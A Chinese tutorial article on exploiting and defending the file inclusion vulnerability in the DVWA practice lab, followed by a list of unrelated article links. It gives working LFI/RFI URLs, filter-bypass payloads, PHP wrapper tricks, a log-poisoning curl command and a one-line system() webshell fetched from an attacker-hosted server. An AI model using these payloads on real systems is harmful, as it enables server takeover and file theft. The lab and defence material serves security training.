当前位置：首页 > article >正文

DVWA文件包含漏洞实战：从allow_url_include配置到GetShell全流程解析

article 2026/3/20 0:10:10

DVWA文件包含漏洞实战从环境配置到攻击防御全解析漏洞原理与靶场环境搭建文件包含漏洞是Web安全领域常见的高危漏洞之一它允许攻击者通过动态文件包含机制读取敏感文件或执行任意代码。在PHP开发中include、require等函数的不当使用是导致该漏洞的主要原因。漏洞核心机制当开发者使用变量动态包含文件时若未对用户输入进行严格过滤攻击者就能控制包含的文件路径。根据包含文件的来源可分为两种类型本地文件包含(LFI)包含服务器本地的文件远程文件包含(RFI)通过HTTP/FTP等协议包含远程服务器上的文件在DVWA靶场中文件包含模块默认会提示The PHP function allow_url_include is not enabled这是因为PHP的安全配置限制了远程文件包含功能。要启用完整功能需修改php.ini中的两个关键参数allow_url_include On allow_url_fopen On修改后需重启Web服务使配置生效。值得注意的是在生产环境中开启这些选项会显著增加安全风险靶场环境仅为教学目的而配置。基础漏洞利用实战Low安全级别无防护的包含漏洞在DVWA的Low安全级别下代码直接使用用户输入的page参数进行文件包含没有任何过滤措施$file $_GET[page];这种实现方式极其危险攻击者可以读取系统敏感文件如/etc/passwd包含远程恶意脚本执行任意代码通过路径遍历访问Web目录外的文件典型攻击示例# 本地文件包含 http://靶场地址/vulnerabilities/fi/?page../../../../etc/passwd # 远程文件包含 http://靶场地址/vulnerabilities/fi/?pagehttp://攻击者服务器/shell.txt提示在实际渗透测试中成功利用RFI通常能直接获取服务器权限是最危险的Web漏洞之一Medium安全级别基础过滤与绕过Medium级别增加了简单的过滤机制$file str_replace(array(http://, https://), , $file); $file str_replace(array(../, ..\\), , $file);这种过滤可通过以下方式绕过双写绕过hthttp://tp://attacker.com/shell.txt → 过滤后变为http://attacker.com/shell.txt大小写混淆HtTp://或HTTP://可能绕过简单的大小写敏感过滤使用其他协议如ftp://、php://等未被过滤的协议有效Payload示例# 双写绕过路径遍历 http://靶场地址/vulnerabilities/fi/?page....//....//etc/passwd # 大小写混淆远程包含 http://靶场地址/vulnerabilities/fi/?pageHtTp://attacker.com/shell.txt高级攻击技术与防御绕过High安全级别严格的文件名限制High级别采用了更严格的限制只允许包含以file开头的文件if(!fnmatch(file*, $file) $file ! include.php) { echo ERROR: File not found!; exit; }这种情况下攻击者可以利用file协议读取本地文件file:///etc/passwd结合已知文件路径进行目录遍历file1.php../../../../etc/passwd高级利用技巧# 使用file协议读取配置文件 http://靶场地址/vulnerabilities/fi/?pagefile:///etc/passwd # 日志文件注入攻击需知道日志路径 1. 访问包含PHP代码的URL?php system($_GET[cmd]);? 2. 包含日志文件执行代码?page../../var/log/apache2/access.logcmdid伪协议利用技术PHP支持多种伪协议在文件包含漏洞中特别有用协议用途示例php://input执行POST数据中的代码需同时发送POST请求体php://filter读取文件源码Base64编码php://filter/convert.base64-encode/resourceconfig.phpdata://直接包含Base64编码的数据data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8伪协议攻击示例# 使用php://filter读取配置文件源码 http://靶场地址/vulnerabilities/fi/?pagephp://filter/convert.base64-encode/resourceindex.php # 使用data://直接执行代码 http://靶场地址/vulnerabilities/fi/?pagedata://text/plain,?php system(id);?防御方案与最佳实践多层级防御策略输入验证层使用白名单严格限制可包含的文件过滤所有特殊字符../, ://等验证文件扩展名和路径配置加固层allow_url_include Off allow_url_fopen Off open_basedir /var/www/html代码设计层避免动态包含用户可控的文件使用固定文件映射代替直接变量包含实现文件完整性校验机制安全代码示例不安全实现$page $_GET[page]; include($page);安全实现$allowed [home.php, about.php, contact.php]; $page $_GET[page]; if(in_array($page, $allowed)) { include($page); } else { include(404.php); }漏洞利用的实战案例案例1通过文件包含获取WebShell准备一个包含WebShell代码的文本文件shell.txt?php system($_GET[cmd]);?在攻击者服务器上启动HTTP服务python3 -m http.server 80通过RFI包含远程文件http://靶场地址/vulnerabilities/fi/?pagehttp://攻击者IP/shell.txt?cmdid案例2日志注入攻击确定Web服务器日志路径如/var/log/apache2/access.log发送包含PHP代码的请求curl -A ?php system($_GET[cmd]);? http://靶场地址/包含日志文件执行代码http://靶场地址/vulnerabilities/fi/?page../../var/log/apache2/access.logcmdid生产环境防护建议最小权限原则Web服务器以低权限用户运行限制PHP可访问的目录open_basedir定期审计文件权限深度防御措施部署WAF拦截包含攻击特征请求启用PHP安全模式safe_mode配置SELinux/AppArmor限制Web进程行为持续监控监控异常文件包含行为审计包含的文件路径记录并分析包含失败的尝试文件包含漏洞的危害不容小觑从简单的信息泄露到完整的系统沦陷都可能发生。通过DVWA靶场的实践我们可以深入理解漏洞原理、掌握多种利用技术并学习如何构建有效的防御体系。

DVWA文件包含漏洞实战：从allow_url_include配置到GetShell全流程解析

相关文章：

DVWA文件包含漏洞实战：从allow_url_include配置到GetShell全流程解析

【Java面试必考】面向对象核心：三大特性、抽象类与接口、重写与重载详解

RimWorld Mod开发避坑指南：从零开始配置.NET 4.7.2环境到生成dll

Reflexion框架解析：如何通过语言反馈实现LLM Agent的自我强化

Astrofox：如何用3个步骤将音频变成惊艳的视觉盛宴

电力负荷预测数据集盘点：从单站到多区域的实战资源指南

三菱fx5u PLC螺丝机项目全套程序（含威纶触摸屏与三菱伺服电机控制）

Swin2SR跨平台支持：移动端集成的技术挑战与方案

DeepChat跨平台部署指南：从环境诊断到生产构建的全流程实践

php方案 PHP的数据库Schema版本管理

从图形学到机械臂控制：如何用Bresenham算法实现3轴机械臂的直线插补（附Processing代码）

RetinaFace人脸检测实战：从镜像部署到批量图片处理的完整流程

实测7天！2026年AI工具红黑榜：90%程序员都在交智商税，谁在封神谁在割韭菜？

LaTeX科技论文写作：深度学习实验结果可视化技巧

永磁同步电机坐标变换：从静止到旋转的数学解析

ERNIE-4.5-0.3B-PT效果惊艳：Chainlit中数学推理题分步解答与验证过程

H5移动端安全区适配实战：解决iOS与Android全面屏布局难题

避坑指南：Xinference-v1.17.1在Jupyter中常见问题解决，小白也能轻松上手

双2080Ti加持：Ubuntu下vllm与openweb-ui高效部署DeepSeek-R1实战

C#与Sql Server 2008 R2图书信息管理系统源码解析：基于VS2015与.NET...

今天发现p1108里面被小孩子塞了饼干进去，我都不知道——但是为何打印机经常出现随机中断——有时候还多打印——页面还出现竖向条纹，这个到底什么原因？-是不是打印机坏了？需要修吗？

昇腾 910B 多机部署 DeepSeek-V3/R1 671B 满血版：从零到一的实战避坑指南

根据所提供的文字范围，一个合适的标题可以是：“MATLAB仿真：复现耗散孤子共振DSR及金兹堡...

标点恢复不靠猜！SenseVoice-Small ONNX集成CT-Transformer实操详解

ViT中的Patch Embedding：从图像分割到向量映射的完整代码解析（PyTorch版）

Qwen-Image-2512-Pixel-Art-LoRA 模型v1.0 建筑与室内设计：生成等轴视角像素风格设计草图

【图神经网络】DGL实战：异构图神经网络在推荐系统中的应用

opencode保险科技：精算模型AI编程辅助实践

nodejs+vue基于springboot的广东省家庭亲子旅游接待信息定制餐饮购票

nodejs+vue基于springboot的巨会玩剧本杀服务平台管理系统